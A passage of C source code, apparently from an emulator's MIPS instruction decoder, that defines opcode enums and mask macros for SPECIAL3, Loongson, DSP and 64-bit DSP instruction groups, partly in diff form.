= 0x01 | OPC_SPECIAL3, + OPC_DEXTU = 0x02 | OPC_SPECIAL3, + OPC_DEXT = 0x03 | OPC_SPECIAL3, + OPC_INS = 0x04 | OPC_SPECIAL3, + OPC_DINSM = 0x05 | OPC_SPECIAL3, + OPC_DINSU = 0x06 | OPC_SPECIAL3, + OPC_DINS = 0x07 | OPC_SPECIAL3, + OPC_FORK = 0x08 | OPC_SPECIAL3, + OPC_YIELD = 0x09 | OPC_SPECIAL3, + OPC_BSHFL = 0x20 | OPC_SPECIAL3, + OPC_DBSHFL = 0x24 | OPC_SPECIAL3, + OPC_RDHWR = 0x3B | OPC_SPECIAL3, + + /* Loongson 2E */ + OPC_MULT_G_2E = 0x18 | OPC_SPECIAL3, + OPC_MULTU_G_2E = 0x19 | OPC_SPECIAL3, + OPC_DIV_G_2E = 0x1A | OPC_SPECIAL3, + OPC_DIVU_G_2E = 0x1B | OPC_SPECIAL3, + OPC_DMULT_G_2E = 0x1C | OPC_SPECIAL3, + OPC_DMULTU_G_2E = 0x1D | OPC_SPECIAL3, + OPC_DDIV_G_2E = 0x1E | OPC_SPECIAL3, + OPC_DDIVU_G_2E = 0x1F | OPC_SPECIAL3, + OPC_MOD_G_2E = 0x22 | OPC_SPECIAL3, + OPC_MODU_G_2E = 0x23 | OPC_SPECIAL3, + OPC_DMOD_G_2E = 0x26 | OPC_SPECIAL3, + OPC_DMODU_G_2E = 0x27 | OPC_SPECIAL3, + + /* MIPS DSP Load */ + OPC_LX_DSP = 0x0A | OPC_SPECIAL3, + /* MIPS DSP Arithmetic */ + OPC_ADDU_QB_DSP = 0x10 | OPC_SPECIAL3, + OPC_ADDU_OB_DSP = 0x14 | OPC_SPECIAL3, + OPC_ABSQ_S_PH_DSP = 0x12 | OPC_SPECIAL3, + OPC_ABSQ_S_QH_DSP = 0x16 | OPC_SPECIAL3, + /* OPC_ADDUH_QB_DSP is same as 
OPC_MULT_G_2E. */ + /* OPC_ADDUH_QB_DSP = 0x18 | OPC_SPECIAL3, */ + OPC_CMPU_EQ_QB_DSP = 0x11 | OPC_SPECIAL3, + OPC_CMPU_EQ_OB_DSP = 0x15 | OPC_SPECIAL3, + /* MIPS DSP GPR-Based Shift Sub-class */ + OPC_SHLL_QB_DSP = 0x13 | OPC_SPECIAL3, + OPC_SHLL_OB_DSP = 0x17 | OPC_SPECIAL3, + /* MIPS DSP Multiply Sub-class insns */ + /* OPC_MUL_PH_DSP is same as OPC_ADDUH_QB_DSP. */ + /* OPC_MUL_PH_DSP = 0x18 | OPC_SPECIAL3, */ + OPC_DPA_W_PH_DSP = 0x30 | OPC_SPECIAL3, + OPC_DPAQ_W_QH_DSP = 0x34 | OPC_SPECIAL3, + /* DSP Bit/Manipulation Sub-class */ + OPC_INSV_DSP = 0x0C | OPC_SPECIAL3, + OPC_DINSV_DSP = 0x0D | OPC_SPECIAL3, + /* MIPS DSP Append Sub-class */ + OPC_APPEND_DSP = 0x31 | OPC_SPECIAL3, + OPC_DAPPEND_DSP = 0x35 | OPC_SPECIAL3, + /* MIPS DSP Accumulator and DSPControl Access Sub-class */ + OPC_EXTR_W_DSP = 0x38 | OPC_SPECIAL3, + OPC_DEXTR_W_DSP = 0x3C | OPC_SPECIAL3, + + /* R6 */ + R6_OPC_PREF = 0x35 | OPC_SPECIAL3, + R6_OPC_CACHE = 0x25 | OPC_SPECIAL3, + R6_OPC_LL = 0x36 | OPC_SPECIAL3, + R6_OPC_SC = 0x26 | OPC_SPECIAL3, + R6_OPC_LLD = 0x37 | OPC_SPECIAL3, + R6_OPC_SCD = 0x27 | OPC_SPECIAL3, +}; + +/* BSHFL opcodes */ +#define MASK_BSHFL(op) MASK_SPECIAL3(op) | (op & (0x1F << 6)) + +enum { + OPC_WSBH = (0x02 << 6) | OPC_BSHFL, + OPC_SEB = (0x10 << 6) | OPC_BSHFL, + OPC_SEH = (0x18 << 6) | OPC_BSHFL, + OPC_ALIGN = (0x08 << 6) | OPC_BSHFL, /* 010.bp */ + OPC_ALIGN_END = (0x0B << 6) | OPC_BSHFL, /* 010.00 to 010.11 */ + OPC_BITSWAP = (0x00 << 6) | OPC_BSHFL /* 00000 */ +}; + +/* DBSHFL opcodes */ +#define MASK_DBSHFL(op) MASK_SPECIAL3(op) | (op & (0x1F << 6)) + +enum { + OPC_DSBH = (0x02 << 6) | OPC_DBSHFL, + OPC_DSHD = (0x05 << 6) | OPC_DBSHFL, + OPC_DALIGN = (0x08 << 6) | OPC_DBSHFL, /* 01.bp */ + OPC_DALIGN_END = (0x0F << 6) | OPC_DBSHFL, /* 01.000 to 01.111 */ + OPC_DBITSWAP = (0x00 << 6) | OPC_DBSHFL, /* 00000 */ +}; + +/* MIPS DSP REGIMM opcodes */ +enum { + OPC_BPOSGE32 = (0x1C << 16) | OPC_REGIMM, + OPC_BPOSGE64 = (0x1D << 16) | OPC_REGIMM, +}; + +#define 
MASK_LX(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +/* MIPS DSP Load */ +enum { + OPC_LBUX = (0x06 << 6) | OPC_LX_DSP, + OPC_LHX = (0x04 << 6) | OPC_LX_DSP, + OPC_LWX = (0x00 << 6) | OPC_LX_DSP, + OPC_LDX = (0x08 << 6) | OPC_LX_DSP, +}; + +#define MASK_ADDU_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP Arithmetic Sub-class */ + OPC_ADDQ_PH = (0x0A << 6) | OPC_ADDU_QB_DSP, + OPC_ADDQ_S_PH = (0x0E << 6) | OPC_ADDU_QB_DSP, + OPC_ADDQ_S_W = (0x16 << 6) | OPC_ADDU_QB_DSP, + OPC_ADDU_QB = (0x00 << 6) | OPC_ADDU_QB_DSP, + OPC_ADDU_S_QB = (0x04 << 6) | OPC_ADDU_QB_DSP, + OPC_ADDU_PH = (0x08 << 6) | OPC_ADDU_QB_DSP, + OPC_ADDU_S_PH = (0x0C << 6) | OPC_ADDU_QB_DSP, + OPC_SUBQ_PH = (0x0B << 6) | OPC_ADDU_QB_DSP, + OPC_SUBQ_S_PH = (0x0F << 6) | OPC_ADDU_QB_DSP, + OPC_SUBQ_S_W = (0x17 << 6) | OPC_ADDU_QB_DSP, + OPC_SUBU_QB = (0x01 << 6) | OPC_ADDU_QB_DSP, + OPC_SUBU_S_QB = (0x05 << 6) | OPC_ADDU_QB_DSP, + OPC_SUBU_PH = (0x09 << 6) | OPC_ADDU_QB_DSP, + OPC_SUBU_S_PH = (0x0D << 6) | OPC_ADDU_QB_DSP, + OPC_ADDSC = (0x10 << 6) | OPC_ADDU_QB_DSP, + OPC_ADDWC = (0x11 << 6) | OPC_ADDU_QB_DSP, + OPC_MODSUB = (0x12 << 6) | OPC_ADDU_QB_DSP, + OPC_RADDU_W_QB = (0x14 << 6) | OPC_ADDU_QB_DSP, + /* MIPS DSP Multiply Sub-class insns */ + OPC_MULEU_S_PH_QBL = (0x06 << 6) | OPC_ADDU_QB_DSP, + OPC_MULEU_S_PH_QBR = (0x07 << 6) | OPC_ADDU_QB_DSP, + OPC_MULQ_RS_PH = (0x1F << 6) | OPC_ADDU_QB_DSP, + OPC_MULEQ_S_W_PHL = (0x1C << 6) | OPC_ADDU_QB_DSP, + OPC_MULEQ_S_W_PHR = (0x1D << 6) | OPC_ADDU_QB_DSP, + OPC_MULQ_S_PH = (0x1E << 6) | OPC_ADDU_QB_DSP, +}; + +#define OPC_ADDUH_QB_DSP OPC_MULT_G_2E +#define MASK_ADDUH_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP Arithmetic Sub-class */ + OPC_ADDUH_QB = (0x00 << 6) | OPC_ADDUH_QB_DSP, + OPC_ADDUH_R_QB = (0x02 << 6) | OPC_ADDUH_QB_DSP, + OPC_ADDQH_PH = (0x08 << 6) | OPC_ADDUH_QB_DSP, + OPC_ADDQH_R_PH = (0x0A << 6) | OPC_ADDUH_QB_DSP, + OPC_ADDQH_W = (0x10 << 6) | OPC_ADDUH_QB_DSP, + OPC_ADDQH_R_W = (0x12 
<< 6) | OPC_ADDUH_QB_DSP,
    OPC_SUBUH_QB = (0x01 << 6) | OPC_ADDUH_QB_DSP,
    OPC_SUBUH_R_QB = (0x03 << 6) | OPC_ADDUH_QB_DSP,
    OPC_SUBQH_PH = (0x09 << 6) | OPC_ADDUH_QB_DSP,
    OPC_SUBQH_R_PH = (0x0B << 6) | OPC_ADDUH_QB_DSP,
    OPC_SUBQH_W = (0x11 << 6) | OPC_ADDUH_QB_DSP,
    OPC_SUBQH_R_W = (0x13 << 6) | OPC_ADDUH_QB_DSP,
    /* MIPS DSP Multiply Sub-class insns */
    OPC_MUL_PH = (0x0C << 6) | OPC_ADDUH_QB_DSP,
    OPC_MUL_S_PH = (0x0E << 6) | OPC_ADDUH_QB_DSP,
    OPC_MULQ_S_W = (0x16 << 6) | OPC_ADDUH_QB_DSP,
    OPC_MULQ_RS_W = (0x17 << 6) | OPC_ADDUH_QB_DSP,
};

/*
 * Each MASK_* macro below extracts the fields that select one concrete
 * instruction within a SPECIAL3/DSP sub-opcode group: the SPECIAL3 bits
 * (via MASK_SPECIAL3) plus the 5-bit minor opcode in bits 10..6.  The
 * enum values pair that 5-bit minor opcode with the group's OPC_*_DSP
 * sub-opcode so a masked instruction word compares directly against them.
 */
#define MASK_ABSQ_S_PH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* MIPS DSP Arithmetic Sub-class */
    OPC_ABSQ_S_QB = (0x01 << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_ABSQ_S_PH = (0x09 << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_ABSQ_S_W = (0x11 << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_PRECEQ_W_PHL = (0x0C << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_PRECEQ_W_PHR = (0x0D << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_PRECEQU_PH_QBL = (0x04 << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_PRECEQU_PH_QBR = (0x05 << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_PRECEQU_PH_QBLA = (0x06 << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_PRECEQU_PH_QBRA = (0x07 << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_PRECEU_PH_QBL = (0x1C << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_PRECEU_PH_QBR = (0x1D << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_PRECEU_PH_QBLA = (0x1E << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_PRECEU_PH_QBRA = (0x1F << 6) | OPC_ABSQ_S_PH_DSP,
    /* DSP Bit/Manipulation Sub-class */
    OPC_BITREV = (0x1B << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_REPL_QB = (0x02 << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_REPLV_QB = (0x03 << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_REPL_PH = (0x0A << 6) | OPC_ABSQ_S_PH_DSP,
    OPC_REPLV_PH = (0x0B << 6) | OPC_ABSQ_S_PH_DSP,
};

#define MASK_CMPU_EQ_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* MIPS DSP Arithmetic Sub-class */
    OPC_PRECR_QB_PH = (0x0D << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_PRECRQ_QB_PH = (0x0C << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_PRECR_SRA_PH_W = (0x1E << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_PRECR_SRA_R_PH_W = (0x1F << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_PRECRQ_PH_W = (0x14 << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_PRECRQ_RS_PH_W = (0x15 << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_PRECRQU_S_QB_PH = (0x0F << 6) | OPC_CMPU_EQ_QB_DSP,
    /* DSP Compare-Pick Sub-class */
    OPC_CMPU_EQ_QB = (0x00 << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_CMPU_LT_QB = (0x01 << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_CMPU_LE_QB = (0x02 << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_CMPGU_EQ_QB = (0x04 << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_CMPGU_LT_QB = (0x05 << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_CMPGU_LE_QB = (0x06 << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_CMPGDU_EQ_QB = (0x18 << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_CMPGDU_LT_QB = (0x19 << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_CMPGDU_LE_QB = (0x1A << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_CMP_EQ_PH = (0x08 << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_CMP_LT_PH = (0x09 << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_CMP_LE_PH = (0x0A << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_PICK_QB = (0x03 << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_PICK_PH = (0x0B << 6) | OPC_CMPU_EQ_QB_DSP,
    OPC_PACKRL_PH = (0x0E << 6) | OPC_CMPU_EQ_QB_DSP,
};

#define MASK_SHLL_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* MIPS DSP GPR-Based Shift Sub-class */
    OPC_SHLL_QB = (0x00 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHLLV_QB = (0x02 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHLL_PH = (0x08 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHLLV_PH = (0x0A << 6) | OPC_SHLL_QB_DSP,
    OPC_SHLL_S_PH = (0x0C << 6) | OPC_SHLL_QB_DSP,
    OPC_SHLLV_S_PH = (0x0E << 6) | OPC_SHLL_QB_DSP,
    OPC_SHLL_S_W = (0x14 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHLLV_S_W = (0x16 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRL_QB = (0x01 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRLV_QB = (0x03 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRL_PH = (0x19 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRLV_PH = (0x1B << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRA_QB = (0x04 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRA_R_QB = (0x05 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRAV_QB = (0x06 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRAV_R_QB = (0x07 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRA_PH = (0x09 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRAV_PH = (0x0B << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRA_R_PH = (0x0D << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRAV_R_PH = (0x0F << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRA_R_W = (0x15 << 6) | OPC_SHLL_QB_DSP,
    OPC_SHRAV_R_W = (0x17 << 6) | OPC_SHLL_QB_DSP,
};

#define MASK_DPA_W_PH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* MIPS DSP Multiply Sub-class insns */
    OPC_DPAU_H_QBL = (0x03 << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPAU_H_QBR = (0x07 << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPSU_H_QBL = (0x0B << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPSU_H_QBR = (0x0F << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPA_W_PH = (0x00 << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPAX_W_PH = (0x08 << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPAQ_S_W_PH = (0x04 << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPAQX_S_W_PH = (0x18 << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPAQX_SA_W_PH = (0x1A << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPS_W_PH = (0x01 << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPSX_W_PH = (0x09 << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPSQ_S_W_PH = (0x05 << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPSQX_S_W_PH = (0x19 << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPSQX_SA_W_PH = (0x1B << 6) | OPC_DPA_W_PH_DSP,
    OPC_MULSAQ_S_W_PH = (0x06 << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPAQ_SA_L_W = (0x0C << 6) | OPC_DPA_W_PH_DSP,
    OPC_DPSQ_SA_L_W = (0x0D << 6) | OPC_DPA_W_PH_DSP,
    OPC_MAQ_S_W_PHL = (0x14 << 6) | OPC_DPA_W_PH_DSP,
    OPC_MAQ_S_W_PHR = (0x16 << 6) | OPC_DPA_W_PH_DSP,
    OPC_MAQ_SA_W_PHL = (0x10 << 6) | OPC_DPA_W_PH_DSP,
    OPC_MAQ_SA_W_PHR = (0x12 << 6) | OPC_DPA_W_PH_DSP,
    OPC_MULSA_W_PH = (0x02 << 6) | OPC_DPA_W_PH_DSP,
};

#define MASK_INSV(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* DSP Bit/Manipulation Sub-class */
    OPC_INSV = (0x00 << 6) | OPC_INSV_DSP,
};

#define MASK_APPEND(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* MIPS DSP Append Sub-class */
    OPC_APPEND = (0x00 << 6) | OPC_APPEND_DSP,
    OPC_PREPEND = (0x01 << 6) | OPC_APPEND_DSP,
    OPC_BALIGN = (0x10 << 6) | OPC_APPEND_DSP,
};

#define MASK_EXTR_W(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* MIPS DSP Accumulator and
DSPControl Access Sub-class */
    OPC_EXTR_W = (0x00 << 6) | OPC_EXTR_W_DSP,
    OPC_EXTR_R_W = (0x04 << 6) | OPC_EXTR_W_DSP,
    OPC_EXTR_RS_W = (0x06 << 6) | OPC_EXTR_W_DSP,
    OPC_EXTR_S_H = (0x0E << 6) | OPC_EXTR_W_DSP,
    OPC_EXTRV_S_H = (0x0F << 6) | OPC_EXTR_W_DSP,
    OPC_EXTRV_W = (0x01 << 6) | OPC_EXTR_W_DSP,
    OPC_EXTRV_R_W = (0x05 << 6) | OPC_EXTR_W_DSP,
    OPC_EXTRV_RS_W = (0x07 << 6) | OPC_EXTR_W_DSP,
    OPC_EXTP = (0x02 << 6) | OPC_EXTR_W_DSP,
    OPC_EXTPV = (0x03 << 6) | OPC_EXTR_W_DSP,
    OPC_EXTPDP = (0x0A << 6) | OPC_EXTR_W_DSP,
    OPC_EXTPDPV = (0x0B << 6) | OPC_EXTR_W_DSP,
    OPC_SHILO = (0x1A << 6) | OPC_EXTR_W_DSP,
    OPC_SHILOV = (0x1B << 6) | OPC_EXTR_W_DSP,
    OPC_MTHLIP = (0x1F << 6) | OPC_EXTR_W_DSP,
    OPC_WRDSP = (0x13 << 6) | OPC_EXTR_W_DSP,
    OPC_RDDSP = (0x12 << 6) | OPC_EXTR_W_DSP,
};

/*
 * The groups below follow the same layout (5-bit minor opcode in bits
 * 10..6 paired with the group's OPC_*_DSP sub-opcode); judging by the
 * OB/QH/PW data-format suffixes they cover the 64-bit DSP variants —
 * NOTE(review): confirm against the MIPS64 DSP ASE tables.
 */
#define MASK_ABSQ_S_QH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* MIPS DSP Arithmetic Sub-class */
    OPC_PRECEQ_L_PWL = (0x14 << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_PRECEQ_L_PWR = (0x15 << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_PRECEQ_PW_QHL = (0x0C << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_PRECEQ_PW_QHR = (0x0D << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_PRECEQ_PW_QHLA = (0x0E << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_PRECEQ_PW_QHRA = (0x0F << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_PRECEQU_QH_OBL = (0x04 << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_PRECEQU_QH_OBR = (0x05 << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_PRECEQU_QH_OBLA = (0x06 << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_PRECEQU_QH_OBRA = (0x07 << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_PRECEU_QH_OBL = (0x1C << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_PRECEU_QH_OBR = (0x1D << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_PRECEU_QH_OBLA = (0x1E << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_PRECEU_QH_OBRA = (0x1F << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_ABSQ_S_OB = (0x01 << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_ABSQ_S_PW = (0x11 << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_ABSQ_S_QH = (0x09 << 6) | OPC_ABSQ_S_QH_DSP,
    /* DSP Bit/Manipulation Sub-class */
    OPC_REPL_OB = (0x02 << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_REPL_PW = (0x12 << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_REPL_QH = (0x0A << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_REPLV_OB = (0x03 << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_REPLV_PW = (0x13 << 6) | OPC_ABSQ_S_QH_DSP,
    OPC_REPLV_QH = (0x0B << 6) | OPC_ABSQ_S_QH_DSP,
};

#define MASK_ADDU_OB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* MIPS DSP Multiply Sub-class insns */
    OPC_MULEQ_S_PW_QHL = (0x1C << 6) | OPC_ADDU_OB_DSP,
    OPC_MULEQ_S_PW_QHR = (0x1D << 6) | OPC_ADDU_OB_DSP,
    OPC_MULEU_S_QH_OBL = (0x06 << 6) | OPC_ADDU_OB_DSP,
    OPC_MULEU_S_QH_OBR = (0x07 << 6) | OPC_ADDU_OB_DSP,
    OPC_MULQ_RS_QH = (0x1F << 6) | OPC_ADDU_OB_DSP,
    /* MIPS DSP Arithmetic Sub-class */
    OPC_RADDU_L_OB = (0x14 << 6) | OPC_ADDU_OB_DSP,
    OPC_SUBQ_PW = (0x13 << 6) | OPC_ADDU_OB_DSP,
    OPC_SUBQ_S_PW = (0x17 << 6) | OPC_ADDU_OB_DSP,
    OPC_SUBQ_QH = (0x0B << 6) | OPC_ADDU_OB_DSP,
    OPC_SUBQ_S_QH = (0x0F << 6) | OPC_ADDU_OB_DSP,
    OPC_SUBU_OB = (0x01 << 6) | OPC_ADDU_OB_DSP,
    OPC_SUBU_S_OB = (0x05 << 6) | OPC_ADDU_OB_DSP,
    OPC_SUBU_QH = (0x09 << 6) | OPC_ADDU_OB_DSP,
    OPC_SUBU_S_QH = (0x0D << 6) | OPC_ADDU_OB_DSP,
    OPC_SUBUH_OB = (0x19 << 6) | OPC_ADDU_OB_DSP,
    OPC_SUBUH_R_OB = (0x1B << 6) | OPC_ADDU_OB_DSP,
    OPC_ADDQ_PW = (0x12 << 6) | OPC_ADDU_OB_DSP,
    OPC_ADDQ_S_PW = (0x16 << 6) | OPC_ADDU_OB_DSP,
    OPC_ADDQ_QH = (0x0A << 6) | OPC_ADDU_OB_DSP,
    OPC_ADDQ_S_QH = (0x0E << 6) | OPC_ADDU_OB_DSP,
    OPC_ADDU_OB = (0x00 << 6) | OPC_ADDU_OB_DSP,
    OPC_ADDU_S_OB = (0x04 << 6) | OPC_ADDU_OB_DSP,
    OPC_ADDU_QH = (0x08 << 6) | OPC_ADDU_OB_DSP,
    OPC_ADDU_S_QH = (0x0C << 6) | OPC_ADDU_OB_DSP,
    OPC_ADDUH_OB = (0x18 << 6) | OPC_ADDU_OB_DSP,
    OPC_ADDUH_R_OB = (0x1A << 6) | OPC_ADDU_OB_DSP,
};

#define MASK_CMPU_EQ_OB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* DSP Compare-Pick Sub-class */
    OPC_CMP_EQ_PW = (0x10 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMP_LT_PW = (0x11 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMP_LE_PW = (0x12 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMP_EQ_QH = (0x08 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMP_LT_QH = (0x09 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMP_LE_QH = (0x0A << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMPGDU_EQ_OB = (0x18 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMPGDU_LT_OB = (0x19 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMPGDU_LE_OB = (0x1A << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMPGU_EQ_OB = (0x04 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMPGU_LT_OB = (0x05 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMPGU_LE_OB = (0x06 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMPU_EQ_OB = (0x00 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMPU_LT_OB = (0x01 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_CMPU_LE_OB = (0x02 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_PACKRL_PW = (0x0E << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_PICK_OB = (0x03 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_PICK_PW = (0x13 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_PICK_QH = (0x0B << 6) | OPC_CMPU_EQ_OB_DSP,
    /* MIPS DSP Arithmetic Sub-class */
    OPC_PRECR_OB_QH = (0x0D << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_PRECR_SRA_QH_PW = (0x1E << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_PRECR_SRA_R_QH_PW = (0x1F << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_PRECRQ_OB_QH = (0x0C << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_PRECRQ_PW_L = (0x1C << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_PRECRQ_QH_PW = (0x14 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_PRECRQ_RS_QH_PW = (0x15 << 6) | OPC_CMPU_EQ_OB_DSP,
    OPC_PRECRQU_S_OB_QH = (0x0F << 6) | OPC_CMPU_EQ_OB_DSP,
};

#define MASK_DAPPEND(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* DSP Append Sub-class */
    OPC_DAPPEND = (0x00 << 6) | OPC_DAPPEND_DSP,
    OPC_PREPENDD = (0x03 << 6) | OPC_DAPPEND_DSP,
    OPC_PREPENDW = (0x01 << 6) | OPC_DAPPEND_DSP,
    OPC_DBALIGN = (0x10 << 6) | OPC_DAPPEND_DSP,
};

#define MASK_DEXTR_W(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* MIPS DSP Accumulator and DSPControl Access Sub-class */
    OPC_DMTHLIP = (0x1F << 6) | OPC_DEXTR_W_DSP,
    OPC_DSHILO = (0x1A << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTP = (0x02 << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTPDP = (0x0A << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTPDPV = (0x0B << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTPV = (0x03 << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTR_L = (0x10 << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTR_R_L = (0x14 << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTR_RS_L = (0x16 << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTR_W = (0x00 << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTR_R_W = (0x04 << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTR_RS_W = (0x06 << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTR_S_H = (0x0E << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTRV_L = (0x11 << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTRV_R_L = (0x15 << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTRV_RS_L = (0x17 << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTRV_S_H = (0x0F << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTRV_W = (0x01 << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTRV_R_W = (0x05 << 6) | OPC_DEXTR_W_DSP,
    OPC_DEXTRV_RS_W = (0x07 << 6) | OPC_DEXTR_W_DSP,
    OPC_DSHILOV = (0x1B << 6) | OPC_DEXTR_W_DSP,
};

#define MASK_DINSV(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* DSP Bit/Manipulation Sub-class */
